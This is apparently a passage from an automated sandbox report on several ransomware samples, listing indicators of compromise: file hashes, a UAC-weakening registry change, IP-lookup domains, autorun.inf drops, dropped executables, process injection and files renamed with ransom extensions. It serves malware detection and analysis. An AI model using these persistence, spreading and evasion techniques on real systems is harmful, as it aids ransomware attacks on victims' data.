Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\J: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\A: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\T: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\Z: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\O: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\K: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\S: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\T: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\L: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\N: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\S: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\Z: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\J: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\R: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\W: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\D: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\P: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\A: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\B: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\I: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\F: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\X: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\T: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\H: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\M: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\Y: Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe File opened (read-only) \??\R: Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened (read-only) \??\V: Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe File opened (read-only) \??\A: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened (read-only) \??\Y: HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe -
Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 3 IoCs
Possible Turn off User Account Control's privilege elevation for standard users.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" lurwhzlcveb.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" ajhqekm.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0" ajhqekm.exe -
Looks up external IP address via web service 13 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 124 www.whatismyip.ca 67 www.showmyipaddress.com 73 api.2ip.ua 95 api.2ip.ua 97 api.2ip.ua 100 whatismyip.everdot.org 104 api.2ip.ua 114 www.whatismyip.ca 120 whatismyip.everdot.org 70 api.2ip.ua 74 whatismyipaddress.com 86 whatismyip.everdot.org 345 api.2ip.ua -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000023bd5-111.dat autoit_exe -
Drops autorun.inf file 1 TTPs 10 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File opened for modification F:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened for modification \??\f:\AUTORUN.INF Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification C:\autorun.inf ajhqekm.exe File created C:\autorun.inf ajhqekm.exe File opened for modification C:\autorun.inf Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification F:\autorun.inf Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\AUTORUN.INF HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened for modification \??\c:\AUTORUN.INF Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe File opened for modification F:\autorun.inf ajhqekm.exe File created F:\autorun.inf ajhqekm.exe -
Drops file in System32 directory 64 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe ajhqekm.exe File created C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\zryqncncriuikukh.exe ajhqekm.exe File created C:\Windows\SysWOW64\zryqncncriuikukh.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe ajhqekm.exe File created C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe ajhqekm.exe File created C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe ajhqekm.exe File created C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\zryqncncriuikukh.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe ajhqekm.exe File created C:\Windows\System32\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File opened for modification C:\Windows\SysWOW64\hleirspqrussgcenqyrvosbc.abe ajhqekm.exe File created C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\zryqncncriuikukh.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj ajhqekm.exe File created C:\Windows\SysWOW64\HelpMe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File created C:\Windows\System32\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe ajhqekm.exe File created C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe ajhqekm.exe File created C:\Windows\SysWOW64\zryqncncriuikukh.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe ajhqekm.exe File created C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe ajhqekm.exe File created C:\Windows\SysWOW64\notepad.exe.exe HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe File created C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\czlikeuoievovkfhdeqnz.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\zryqncncriuikukh.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\zryqncncriuikukh.exe ajhqekm.exe File created C:\Windows\SysWOW64\hleirspqrussgcenqyrvosbc.abe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe ajhqekm.exe File created C:\Windows\System32\Info.hta Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\njuqrkzslgwouicdyyjf.exe lurwhzlcveb.exe File created C:\Windows\SysWOW64\avfaasgyqkzqvibbvue.exe lurwhzlcveb.exe File opened for modification C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\zryqncncriuikukh.exe ajhqekm.exe File created C:\Windows\SysWOW64\trecfarmhewqyoknkmzxki.exe ajhqekm.exe File created C:\Windows\SysWOW64\qfjysemykyhsrylftmqfjysemykyhsrylft.qfj ajhqekm.exe File created C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe ajhqekm.exe File created C:\Windows\SysWOW64\pjsmlcpgxqeuykcbus.exe ajhqekm.exe File opened for modification C:\Windows\SysWOW64\gzhayoaqgyladofdv.exe lurwhzlcveb.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smm8s760zic0.bmp" Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe Set value (str) \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dau8.bmp" Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe -
Suspicious use of SetThreadContext 21 IoCs
description pid Process procid_target PID 5072 set thread context of 3404 5072 HEUR-Trojan-Ransom.Win32.Foreign.gen-ff6e9f1b64ba5d0c4994921a56321c3026f655b01614e2d16c84edd75be51b8d.exe 128 PID 1652 set thread context of 5804 1652 Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe 240 PID 4324 set thread context of 5264 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 251 PID 2004 set thread context of 9960 2004 Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe 254 PID 2004 set thread context of 9960 2004 Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe 254 PID 3172 set thread context of 10220 3172 Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe 257 PID 1776 set thread context of 7296 1776 tpvpyme.exe 275 PID 1776 set thread context of 6568 1776 tpvpyme.exe 277 PID 1776 set thread context of 11220 1776 tpvpyme.exe 280 PID 1396 set thread context of 9200 1396 Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe 301 PID 2304 set thread context of 6036 2304 Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe 330 PID 4928 set thread context of 8824 4928 HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe 363 PID 4928 set thread context of 8824 4928 HEUR-Trojan-Ransom.Win32.JSWorm.gen-575933c6efb982050b56c2d838c878ee2aba3c89743cfcc58fdc26ab7b76a317.exe 363 PID 3692 set thread context of 5868 3692 Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe 461 PID 4324 set thread context of 9072 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 471 PID 1776 set thread context of 11128 1776 tpvpyme.exe 475 PID 4324 set thread context of 6268 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 477 PID 4324 set thread context of 11236 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 479 PID 4324 set thread context of 7676 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 481 PID 4324 set thread context of 724 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 483 PID 4324 set thread context of 6680 4324 Trojan-Ransom.Win32.Xpan.h-10b893ca31e0e5c0c22350f66d98cefd2c5f74f65d5efe5ab137a63de2bc70ff.exe 485 -
resource yara_rule behavioral1/files/0x0009000000023bcd-99.dat upx behavioral1/memory/4904-101-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/files/0x0009000000023bcf-106.dat upx behavioral1/memory/1408-110-0x0000000000400000-0x0000000000452000-memory.dmp upx behavioral1/memory/4904-160-0x0000000000400000-0x0000000000424000-memory.dmp upx behavioral1/files/0x0008000000023bdb-167.dat upx behavioral1/memory/2004-168-0x0000000000400000-0x0000000000611000-memory.dmp upx behavioral1/memory/2004-389-0x0000000000400000-0x0000000000611000-memory.dmp upx behavioral1/memory/2004-968-0x0000000000400000-0x0000000000611000-memory.dmp upx behavioral1/memory/2004-8840-0x0000000000400000-0x0000000000611000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\api-ms-win-core-fibers-l1-1-0.dll.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ORGCHART.CHM Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\System.Reflection.Emit.Lightweight.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\WindowsFormsIntegration.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Java\jdk-1.8\legal\jdk\mesa3d.md.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected].[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\editpdf.svg.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\cs-cz\ui-strings.js.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-125_contrast-black.png Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\wns_push_client.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_unselected_18.svg.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\8.0.2\zh-Hans\System.Windows.Forms.Design.resources.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-pl.xrm-ms.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\OnlineMediaComponent.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_x64__8wekyb3d8bbwe\Assets\logo.scale-200_contrast-black.png Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\ui-strings.js.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\tnameserv.exe.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\es\System.Data.Services.Client.resources.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\System.Security.Cryptography.Cng.dll.id-7E980581.[[email protected]].bot.id-7E980581.[[email protected]].money Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-core-timezone-l1-1-0.dll.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Private.Xml.Linq.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.GetHelp_10.1706.13331.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\LargeTile.scale-125_contrast-white.png Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\TimerWideTile.contrast-white_scale-200.png Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AGM.dll.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\XLMACRO.CHM.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\GamesXboxHubSplashScreen.scale-125_contrast-white.png Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\System.Xaml.dll.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Retail-ul-phn.xrm-ms.id-7E980581.[[email protected]].bot Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader 